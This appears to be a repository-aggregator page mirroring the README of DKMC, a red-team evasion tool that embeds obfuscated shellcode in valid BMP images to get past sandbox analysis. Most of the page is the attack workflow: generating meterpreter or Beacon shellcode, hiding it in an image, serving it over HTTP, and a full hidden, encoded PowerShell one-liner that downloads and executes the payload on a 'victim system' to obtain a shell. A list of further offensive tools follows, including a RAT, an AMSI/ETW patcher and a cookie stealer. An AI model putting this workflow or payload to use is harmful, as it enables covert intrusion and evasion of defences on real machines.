Mr-Un1k0d3r/DKMC Mr-Un1k0d3r/DKMC

  • This repository has been archived on 20/Mar/2023
  • Stars
    star
    1,323
  • Rank 35,540 (Top 0.8 %)
  • Language
    Python
  • License
    Other
  • Created almost 8 years ago
  • Updated over 4 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
Mr-Un1k0d3r/DKMC
github

Mr-Un1k0d3r

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

DKMC - Dont kill my cat - Malicious payload evasion tool

Don't Kill My Cat (DKMC)

WINDOWS 10 now limit the shellcode payload from running properly due to the need of a RWX page to decode and execute the shellcode. DKMC can be update the set a memory page with properly permission.

Don't kill my cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is 100% valid and also 100% valid shellcode. The idea is to avoid sandbox analysis since it's a simple "legit" image. For now the tool rely on PowerShell the execute the final shellcode payload.

Why it's called don't kill my cat? Since I suck at finding names for tools, I decided to rely on the fact that the default BMP image is a cat to name the tool.

Presentation on how it works internally can be found here: https://github.com/Mr-Un1k0d3r/DKMC/blob/master/DKMC%20presentation%202017.pdf

Basic Flow

  • Generate shellcode (meterpreter / Beacon)
  • Embed the obfuscated shellcode inside the image
  • PowerShell download the image and execute the image as shellcode
  • Get your shell

Installation

$ git clone https://github.com/Mr-Un1k0d3r/DKMC 
$ cd DKMC
$ mkdir output

Usage

Launching DKMC

$ python dkmc.py


DKMC - Don't kill my cat
         Evasion tool - Mr.Un1k0d3r RingZer0 Team
     |\      _,,,---,,_
    /,`.-'`'    -.  ;-;;,_
   |,4-  ) )-,_..;\ (  `'-'
  '---''(_/--'  `-'\_)    The sleepy cat

----------------------------------------------------
Select an option:

        [*] (gen)       Generate a malicious BMP image
        [*] (web)       Start a web server and deliver malicious image
        [*] (ps)        Generate Powershell payload
        [*] (sc)        Generate shellcode from raw file
        [*] (exit)      Quit the application

>>>

Generate shellcode from a raw file

>>> sc
(shellcode)>>> set source shellcode.txt
        [+] source value is set.

(shellcode)>>> run
        [+] Shellcode:
\x41\x41\x41\x41

Generate the obfuscated shellcode embedded inside of an image.

>>> gen
(generate)>>> set shellcode \x41\x41\x41\x41
        [+] shellcode value is set.
        
(generate)>>> run
        [+] Image size is 300 x 275
        [+] Generating obfuscation key 0x1f1dad93
        [+] Shellcode size 0x4 (4) bytes
        [+] Generating magic bytes 0xa4d0c752
        [+] Final shellcode length is 0x57 (87) bytes
        [+] New BMP header set to 0x424de9a4c60300
        [+] New height is 0x0e010000 (270)
        [+] Successfully save the image. (/home/ringzer0/tools/DKMC/output/output-1496175261.bmp)

(generate)>>>

Generate PowerShell payload to execute on the victim system.

>>> ps
(powershell)>>> set url http://127.0.0.1:8080/output-1496175261.bmp
        [+] url value is set.

(powershell)>>> run
        [+] Powershell script:
powershell.exe -nop -w hidden -enc JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBDAEYAVABUAEwAVgBrAEMALwB6AEUAMABPAFQAWQB4AE4AegBVADAATgBEAFEAdQBNAGoAVQAhAHQAVgBaAHIAYgA5AHAASQBGAFAAMABlAEsAZgA5AGgAVgBDAEgAWgBsAG8AdwBMAFMAYgBmAE4AUgBxAHAAVQBuAG4AbQAwAEUASQBKAEoAMABvAFMAaQBhAHIAIQB2AE0ARwBIAHMATQBUAE4AagBFAHIAZgBOAGYAOQA5AHIAWQB6AGQARQBrAEcAeAAyAHQAVwBzACsAWQBIAHYAdQAzAEwAbAB6AHoAcgBuAEgANAA0AEkAdQB1ADEAbwB5AFQAMwBlAEUARAA2AFIAOABDAFYASQB4AEUAWgBLADkAMwBaADMAZABuAFoASwAvAGIASAA4AEYANQBRAHMALwBjAFAAWABGAFAASQBDADcAZQBmACsAbwBkADAANAArAGsAawAvAEcANwBzADQAawBEAGoAMgBkAHgAbAA3ADIANQB2AGYAWAB2AFQAYgA1AHUAYgB0AEQAOABxAHQASABKAFEAMgBJAFcAVgBwAFMAKwBUADAAUQBmAHMAegBCAEoAdABsAEQASgBJAFUASABmAGkAegBCAGUAZwB3AHUATABTADQARwA3AGMAKwBZADEAUgB6AFcAbwBxAGcAcAAhAHMAcgBDADAAZQBGAGgASQA1AFkAUwBRAHIAMQA2AGQAbwA1ACEAMQA1AFMAQwBZAE0AdwBaAEsATgBNAGkAdgA4AGoAVgBEAEMAUwBVAHoAOABhADMANABHAG4AeQBrADUAUwArAE8AMABkAGMAagBDAG4AUAB3ADUASQBHADkAVwBhADQAbwAxAHIAbwBwADIATgBmAGgARQBmAFQAYQBoADAAMwA0AGsAeQBiAHgAcgBkAHYAaABqAFUAcwBWADAAZABPAGEAeABGAFQAcgBrAHoARABUAFoAUwBHAHcAUABFADUATgB5AHoAeQBZAEsAVQBMAEQAcABJAEkAVABLAFAARABQAEMAbQBVAG0ARwBqAG4AaQBvAFgANwBlADgANQBGAHEATwBnAEUAdQBwAGgAdABDAFIAMwBRAE0AKwBFAHIAdwAwAHIAaABLAHYAWQBqAFEAYwBjAHkAegBMAGUAVgA1AGwAbABGAG0AUQBiAGUAOQBuAEQALwBOAGQAKwBYAG8ASABDAFMAYwB4AEkAdQB4AFIAegBNAFUAaABoAHoAYgBwAE4AUAA1AGoAIQB2AG8AaAArAEgAbQBnAFcAIQA0AHgAcQBrAGkARgB5AFEAUwArAGEAQgBjAG8ANQBwADYASABQAG8AdwAyAFIAawBkAHUARwB1ADIAUAB0AHIASgA1AG4AcgBrAHoAQwBxAHAANgBWAGwASQAwAG4AYgA2AHUAeABrAHAASwAyAG0ARwB0AFoAbQBwAFcAdgBNAFcAbgBoAHQAcwBJAHUAIQBQAEsAUwBZAC8AQgBiAEoAZgBMAEgAbwBSAC8AVwBsAFkAdQBGAFIAdQBFAFUAcABqAHkAKwBLAGEANQBpAE4AIQBPADcARgA3ACEAbgBGAHMAaQBRAGYAUwBjAFUAbQBIAFMAeQBLAGEAaQBFAFQAZgBDAHcATgBaACEAegBXAGkAIQB4AFQAcQBvAGEAagBFAFMAbABCAGYAQwA0AG4AOAA2AGIAbwBkADQASwBwAGwAOQBSAG8AYgBMADgAMgBkAGIAWABJAGcAMQBuAEcANAArAG4AMAA3AFAAagBIAFkARABZAE4ARgBxADAAegBIAEIAeABlAEMAdQBhAFAASABsAE0AOQBJAGIAegBVAHYAagBtACsAZwBMAG8ATwB1AEMALwBiAFgAWAA0ADAAVABpAGMAOABMACsAVQBtAFQARgBnAEkAegBTAFMAawAhAGYATQBLAHQAWgByAGIARwBJAFUASgBoAHcAdwArAHAAdwBqAHIAWQB0ADIAbQBrAFEAKwAhADMAdwBRAE8AVQA2AHAAVABpAG0AdwB5ADMASgB6AFcAQwBwAGoAKwBQAGIAYwBlAE0AKwA2AEQAcgBIAG0AbwBDAG8AVgBWAG8AVwBDAHMAcAA4AFcAcwBXAEQAZQBOAGsANwAhAEQAIQBTAEsAOABlAGoAYQBRADMAUQBuADIAQwBCAFQAUgBlAFYAOABrAHgAZQByAHAATQB3AFkAWgBEAFUANgBWAHMAawBrAHYAeABpAGIAMQBiAE8ASQBDADUAZQBEAGIAcABCAFkAcQBsAGcALwBWAFkAaQAyAHkAVwArAE8AeAAzAEUANwBNAE4AZgBPAG8AMABrAFcANgBrAGYAVQBDAHQASABrAEoARABSAEUAcQBMAFcATQBQAGQAWQBCAHcARABOAHcASQBQAEUAWgA1AGkAbwA1AE4AagBwAGsAUAA5AGMAUgBsADAANgBJAFUAWQB5AHMAMgBEAGMAbwA1AEMANgBlAFkAYQBZAG4AYwA0AEoAcwBVAEUAMQBlAG4ANgBwAEoAWQA5AGEAYQBTAEwATQBjAEYAZgBSAEoARQBIACEASwBjAGsATABsAEoAbQA5AE0AcABlAGsAZgBlAGUAcABrADIANgBSAFIAOAA0AHgAVQA3AEsASgBwAHQAMQBWAGsAcABmACEAVgB1AGEALwBXAGoASgBsAHcAdQB0AEUAMAB1AG0AZABUAG8AVQB5AGsAVgBUADcAWAA1ADMAeABWAGEAMgBOAFoARwB2AFEAMABKAE8AYwBsAG0AMABkAGIARABlAHEATABUAGYAaQB2AEYAQwBYAEIAKwBmAG4AWQBSAFgAWQBlADMAbAAxAGUAZABtADMANgBYAHoAZwBhADMAawBVADcAZABmAEYAUABRAFgAVQAhAFQAaABYAEUARABQAFQAegBVAHEAQwBaAHgARgAzAEoAQgAvAFMAYgBWADEASAB3AHoAMAB6AG8ANgBmAFAAdQAyAHUAdgBmAEIAcQBlAEMAdgBlAG4AaABRAE8AYQBpADgARgBiAEcATwBZAGwAMgB1AHYAdgB2AHoAZgBmAFgARABIADMAdgB2AHEAOAA0ADQAaQBOADUAawA3AFYAZgA2ACsAaQBOAGEAcQBMADUAcQBpAGQAbABpAGUAagBvAC8AdgBiADYAZQB6AEQANgBQAGsANQBPAGIAdABQADMAKwB4AGgAUQA3AFYASwBvAFoANQBjAGcANABtAGwAMABoAHYATABhAFEANwBkAHkAdgBlAG8ASwBsAE0AMAB5AHoAKwBMAGoATgBRAFkAYgAhADAAZgA3AHgAIQAxAEcAdwBVAGUATgBjAGUASwBtAEYAUABqAEUAMwB0AFAARwBWAHUAWQA1AFEAZABoAGQANAB1ADcAKwAzADkAYwA0AGkAdgB3AE8AdABSADQAYwB0AFgAaAAwAGUAMwBtAEQAQgB5AE8ANQB6AEMARAB0AGYASQBKAHoAcQBtAFYAMgA1ADMANgA5AFUAMABCAFkAcgA5ACsAOABxAEMATQB2AHIATgA5ADQAUQBVAFcASQArAG0AOQA1AE8AcgBmAFoAWgBoAEYAKwBxAGkAMgBkADEAcgBSAGgAYQAwAHYANQA5ADcAZQBZADYAawBkAEQAcwA5AGkANAA3AHIAVgBiAGMAOQBPAGIALwBPAHoAMgA1AFkARwBmADQANQA3ACsAVwBuAHMAZAAzAEwANAB5ACsAaQByAEsASwAvAFQAeABzAEcANgBGAFAAWAAvAHcAagAvAHYANABOAE0AbABlAFUAYQBRAHgAMgAwAGYAYwA0AHIASAByAHoAWgBZAEIAeQBxAGEANgBkACEATABaAFMAaQBpAHEAYwA1AEYAZAA2AE4ARAB2AEQAagB1ADMAaQBTAFcARgAzAHgALwBpAFUANgB1AEIAawBRAHQAWgBRAFUAdQB3AEgAbgBzAHQAZwBRAFEANgBzADkAWgBPACEAMABsAFQAcQA4AHEAMABZADQAMgBFAHUAUwBqAC8AUQB1AEYAWQByADYAcAArADEANQAwAGUAdAB3AFQASwB1ADkAOAArAEQAZgBxAHQAdQBrAFoAUABXAFYANwBKAHQAaABEAHkAUQBNAHEASgBXAFUALwB0ADcAZQBPAHEAVAAwAHoAZwAxAFAALwBMAGMARwBmAFkAWAB1AFUATQBzAHMAdQBWACsAawBUADUANABnAEsAZQA1ADgAcQBrAFkAWgB3AFkASAArAEwARgBiAEwAeQAxAGIAYwBuAHMAaQBqAFAAOABMAHAAegBWADkAdABFAFEATAAhACEAIQA9ACIALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAgACIAQQAiACkAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA

(powershell)>>>

Built-in Web Server to deliver the image

>>> web 
(web)>>> set port 8080
        [+] port value is set.

(web)>>> run
        [+] Starting web server on port 8080

127.0.0.1 - - [30/May/2017 16:18:43] "GET /output-1496175261.bmp HTTP/1.1" 200 -

Final step require you to run the PowerShell oneliner on the victim system.

TODO

Support more file format.

Credit

Mr.Un1k0d3r RingZer0 Team 2016

More Repositories

1

EDRs

C
1,857
star
2

PowerLessShell

Run PowerShell command without invoking powershell.exe
Python
1,413
star
3

SCShell

Fileless lateral movement tool that relies on ChangeServiceConfigA to run command
C
1,268
star
4

RedTeamPowershellScripts

Various PowerShell scripts that may be useful during red team exercise
PowerShell
878
star
5

MaliciousMacroGenerator

Malicious Macro Generator
Visual Basic
811
star
6

ThunderShell

Python / C# Unmanaged PowerShell based RAT
Python
770
star
7

RedTeamCSharpScripts

C# Script used for Red Team
C#
706
star
8

RedTeamCCode

Red Team C code repo
C
464
star
9

CatMyPhish

Search for categorized domain
Python
418
star
10

PoisonHandler

lateral movement techniques that can be used during red team exercises
PowerShell
264
star
11

MaliciousClickOnceGenerator

Quick Malicious ClickOnceGenerator for Red Team
C#
234
star
12

ADHuntTool

official repo for the AdHuntTool (part of the old RedTeamCSharpScripts repo)
C#
229
star
13

Windows-SignedBinary

Python
224
star
14

.NetConfigLoader

.net config loader
223
star
15

Shellcoding

Shellcoding utilities
C
209
star
16

ATP-PowerShell-Scripts

Microsoft Signed PowerShell scripts
PowerShell
203
star
17

WindowsDllsExport

A list of all the DLLs export in C:\windows\system32\
C
199
star
18

AMSI-ETW-Patch

Patch AMSI and ETW
C#
196
star
19

DLLsForHackers

Dll that can be used for side loading and other attack vector.
Python
175
star
20

MaliciousDLLGenerator

DLL Generator for side loading attack
C
163
star
21

SCT-obfuscator

Cobalt Strike SCT payload obfuscator
Python
142
star
22

RedTeamScripts

Repo with various Red Team scripts
Python
137
star
23

Elevate-System-Trusted-BOF

C
132
star
24

Cookie-Graber-BOF

C or BOF file to extract WebKit master key to decrypt user cookie
C
129
star
25

SPFAbuse

SPF are not as strong as you may think. Red Team tool to send email on behalf of your target corp
Python
128
star
26

RemoteProcessInjection

C# remote process injection utility for Cobalt Strike
C#
80
star
27

Base64-Obfuscator

Simple PowerShell Base64 encoder to avoid detection of your malicious payload
PowerShell
74
star
28

SearchIPOwner

Search public IP owner through ARIN
Python
51
star
29

RedTeamFSharp

Red Team Toolset written in F# (Experimental)
F#
26
star
30

SideChannelAttack

Side Channel script
Python
24
star
31

BOFCode

Bunch of BOF files
C
13
star
32

blog.mr.un1k0d3r.com

Mr.Un1k0d3r.com blog
HTML
9
star
33

MsGraphFunzy

Scripts to interact with Microsoft Graph APIs
Python
5
star